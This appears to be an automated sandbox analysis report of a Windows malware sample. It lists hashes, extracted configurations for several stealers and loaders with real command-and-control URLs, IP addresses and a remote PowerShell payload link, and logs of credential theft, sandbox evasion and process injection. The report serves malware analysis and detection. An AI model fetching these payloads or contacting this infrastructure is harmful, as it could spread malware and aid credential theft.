Analysis
-
max time kernel
151s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
12-10-2021 13:48
Static task
static1
Behavioral task
behavioral1
Sample
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe
Resource
win10-en-20210920
General
-
Target
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe
-
Size
175KB
-
MD5
2e7e57118f032396e69d376486034f2a
-
SHA1
776f1be291d84052a024ce14883247eda7307f16
-
SHA256
8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9
-
SHA512
fc2905c6f2a095b546ec751c47e28db472f38b89c3f62f71bf8c3cebaa77a5aaa9540340837fe690960beda1999b7dc59c8c9cbadfe30937ef26c2c1d7e108ff
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://linavanandr11.club/
http://iselaharty12.club/
http://giovaninardo13.club/
http://zayneliann14.club/
http://zorinosali15.club/
Extracted
raccoon
1.8.2
fbe5e97e7d069407605ee9138022aa82166657e6
-
url4cnc
http://telemirror.top/stevuitreen
http://tgmirror.top/stevuitreen
http://telegatt.top/stevuitreen
http://telegka.top/stevuitreen
http://telegin.top/stevuitreen
https://t.me/stevuitreen
Extracted
vidar
41.3
1033
https://mas.to/@oleg98
-
profile_id
1033
Extracted
raccoon
1.8.2
8d179b9e611eee525425544ee8c6d77360ab7cd9
-
url4cnc
http://teletop.top/agrybirdsgamerept
http://teleta.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
Extracted
raccoon
1.8.2
27d80aa27e80cd2ef63c638e2752e24242d1b37c
-
url4cnc
http://telemirror.top/ararius809b
http://tgmirror.top/ararius809b
http://telegatt.top/ararius809b
http://telegka.top/ararius809b
http://telegin.top/ararius809b
https://t.me/ararius809b
Extracted
redline
w1
109.234.34.165:12323
Extracted
redline
MegaProliv
93.115.20.139:28978
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral1/memory/3252-160-0x0000000000750000-0x0000000000781000-memory.dmp family_redline behavioral1/memory/3252-166-0x0000000002640000-0x000000000265C000-memory.dmp family_redline behavioral1/memory/1816-223-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/1816-224-0x000000000041B25E-mapping.dmp family_redline behavioral1/memory/1816-251-0x0000000005230000-0x0000000005836000-memory.dmp family_redline -
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/2120-130-0x00000000033C0000-0x0000000003496000-memory.dmp family_vidar behavioral1/memory/2120-131-0x0000000000400000-0x0000000001735000-memory.dmp family_vidar -
Blocklisted process makes network request 9 IoCs
flow pid Process 98 2252 powershell.exe 100 2252 powershell.exe 101 2252 powershell.exe 102 2252 powershell.exe 104 2252 powershell.exe 106 2252 powershell.exe 108 2252 powershell.exe 110 2252 powershell.exe 112 2252 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
pid Process 2116 B18.exe 2120 1097.exe 340 252A.exe 1376 343E.exe 3600 398E.exe 3252 4065.exe 2236 4B72.exe 1724 519E.exe 1816 519E.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000700000001abcb-637.dat upx behavioral1/files/0x000600000001abcd-640.dat upx -
resource yara_rule behavioral1/files/0x000600000001abe6-139.dat vmprotect behavioral1/files/0x000600000001abe6-140.dat vmprotect behavioral1/memory/1376-146-0x0000000000A60000-0x00000000018A6000-memory.dmp vmprotect -
Deletes itself 1 IoCs
pid Process 392 Process not Found -
Loads dropped DLL 9 IoCs
pid Process 2120 1097.exe 2120 1097.exe 3636 Process not Found 3636 Process not Found 2116 B18.exe 2116 B18.exe 2116 B18.exe 2116 B18.exe 2116 B18.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts B18.exe -
Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook B18.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook B18.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2388 set thread context of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 70 PID 1724 set thread context of 1816 1724 519E.exe 86 -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 24 IoCs
description ioc Process File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB7B5.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0xbgxfbj.t11.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB7C6.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB7C7.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2d0rdsal.alc.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB794.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB7A5.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 1097.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 1097.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2424 timeout.exe 908 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 4004 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = a63109125baed701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1680 reg.exe 688 reg.exe -
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 100 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 101 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 102 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 104 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3440 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 3440 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 392 Process not Found -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 624 Process not Found 624 Process not Found 624 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3440 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 392 Process not Found Token: SeCreatePagefilePrivilege 392 Process not Found Token: SeShutdownPrivilege 392 Process not Found Token: SeCreatePagefilePrivilege 392 Process not Found Token: SeDebugPrivilege 4004 taskkill.exe Token: SeShutdownPrivilege 392 Process not Found Token: SeCreatePagefilePrivilege 392 Process not Found Token: SeShutdownPrivilege 392 Process not Found Token: SeCreatePagefilePrivilege 392 Process not Found Token: SeShutdownPrivilege 392 Process not Found Token: SeCreatePagefilePrivilege 392 Process not Found Token: SeShutdownPrivilege 392 Process not Found Token: SeCreatePagefilePrivilege 392 Process not Found Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 3252 4065.exe Token: SeShutdownPrivilege 392 Process not Found Token: SeCreatePagefilePrivilege 392 Process not Found Token: SeShutdownPrivilege 392 Process not Found Token: SeCreatePagefilePrivilege 392 Process not Found Token: SeShutdownPrivilege 392 Process not Found Token: SeCreatePagefilePrivilege 392 Process not Found Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 1816 519E.exe Token: SeIncreaseQuotaPrivilege 2680 powershell.exe Token: SeSecurityPrivilege 2680 powershell.exe Token: SeTakeOwnershipPrivilege 2680 powershell.exe Token: SeLoadDriverPrivilege 2680 powershell.exe Token: SeSystemProfilePrivilege 2680 powershell.exe Token: SeSystemtimePrivilege 2680 powershell.exe Token: SeProfSingleProcessPrivilege 2680 powershell.exe Token: SeIncBasePriorityPrivilege 2680 powershell.exe Token: SeCreatePagefilePrivilege 2680 powershell.exe Token: SeBackupPrivilege 2680 powershell.exe Token: SeRestorePrivilege 2680 powershell.exe Token: SeShutdownPrivilege 2680 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe Token: SeSystemEnvironmentPrivilege 2680 powershell.exe Token: SeRemoteShutdownPrivilege 2680 powershell.exe Token: SeUndockPrivilege 2680 powershell.exe Token: SeManageVolumePrivilege 2680 powershell.exe Token: 33 2680 powershell.exe Token: 34 2680 powershell.exe Token: 35 2680 powershell.exe Token: 36 2680 powershell.exe Token: SeDebugPrivilege 676 powershell.exe Token: SeIncreaseQuotaPrivilege 676 powershell.exe Token: SeSecurityPrivilege 676 powershell.exe Token: SeTakeOwnershipPrivilege 676 powershell.exe Token: SeLoadDriverPrivilege 676 powershell.exe Token: SeSystemProfilePrivilege 676 powershell.exe Token: SeSystemtimePrivilege 676 powershell.exe Token: SeProfSingleProcessPrivilege 676 powershell.exe Token: SeIncBasePriorityPrivilege 676 powershell.exe Token: SeCreatePagefilePrivilege 676 powershell.exe Token: SeBackupPrivilege 676 powershell.exe Token: SeRestorePrivilege 676 powershell.exe Token: SeShutdownPrivilege 676 powershell.exe Token: SeDebugPrivilege 676 powershell.exe Token: SeSystemEnvironmentPrivilege 676 powershell.exe Token: SeRemoteShutdownPrivilege 676 powershell.exe Token: SeUndockPrivilege 676 powershell.exe Token: SeManageVolumePrivilege 676 powershell.exe Token: 33 676 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found -
Suspicious use of SendNotifyMessage 5 IoCs
pid Process 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found 392 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 70 PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 70 PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 70 PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 70 PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 70 PID 2388 wrote to memory of 3440 2388 8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe 70 PID 392 wrote to memory of 2116 392 Process not Found 71 PID 392 wrote to memory of 2116 392 Process not Found 71 PID 392 wrote to memory of 2116 392 Process not Found 71 PID 392 wrote to memory of 2120 392 Process not Found 72 PID 392 wrote to memory of 2120 392 Process not Found 72 PID 392 wrote to memory of 2120 392 Process not Found 72 PID 392 wrote to memory of 340 392 Process not Found 73 PID 392 wrote to memory of 340 392 Process not Found 73 PID 392 wrote to memory of 340 392 Process not Found 73 PID 392 wrote to memory of 1376 392 Process not Found 74 PID 392 wrote to memory of 1376 392 Process not Found 74 PID 392 wrote to memory of 3600 392 Process not Found 75 PID 392 wrote to memory of 3600 392 Process not Found 75 PID 392 wrote to memory of 3600 392 Process not Found 75 PID 392 wrote to memory of 3252 392 Process not Found 76 PID 392 wrote to memory of 3252 392 Process not Found 76 PID 392 wrote to memory of 3252 392 Process not Found 76 PID 2120 wrote to memory of 1732 2120 1097.exe 78 PID 2120 wrote to memory of 1732 2120 1097.exe 78 PID 2120 wrote to memory of 1732 2120 1097.exe 78 PID 1732 wrote to memory of 4004 1732 cmd.exe 80 PID 1732 wrote to memory of 4004 1732 cmd.exe 80 PID 1732 wrote to memory of 4004 1732 cmd.exe 80 PID 392 wrote to memory of 2236 392 Process not Found 82 PID 392 wrote to memory of 2236 392 Process not Found 82 PID 392 wrote to memory of 2236 392 Process not Found 82 PID 1732 wrote to memory of 2424 1732 cmd.exe 83 PID 1732 wrote to memory of 2424 1732 cmd.exe 83 PID 1732 wrote to memory of 2424 1732 cmd.exe 83 PID 392 wrote to memory of 1724 392 Process not Found 84 PID 392 wrote to memory of 1724 392 Process not Found 84 PID 392 wrote to memory of 1724 392 Process not Found 84 PID 1724 wrote to memory of 1816 1724 519E.exe 86 PID 1724 wrote to memory of 1816 1724 519E.exe 86 PID 1724 wrote to memory of 1816 1724 519E.exe 86 PID 1376 wrote to memory of 1768 1376 343E.exe 87 PID 1376 wrote to memory of 1768 1376 343E.exe 87 PID 1768 wrote to memory of 2856 1768 powershell.exe 89 PID 1768 wrote to memory of 2856 1768 powershell.exe 89 PID 1724 wrote to memory of 1816 1724 519E.exe 86 PID 1724 wrote to memory of 1816 1724 519E.exe 86 PID 1724 wrote to memory of 1816 1724 519E.exe 86 PID 1724 wrote to memory of 1816 1724 519E.exe 86 PID 1724 wrote to memory of 1816 1724 519E.exe 86 PID 2856 wrote to memory of 3796 2856 csc.exe 90 PID 2856 wrote to memory of 3796 2856 csc.exe 90 PID 2236 wrote to memory of 2208 2236 4B72.exe 91 PID 2236 wrote to memory of 2208 2236 4B72.exe 91 PID 2236 wrote to memory of 2208 2236 4B72.exe 91 PID 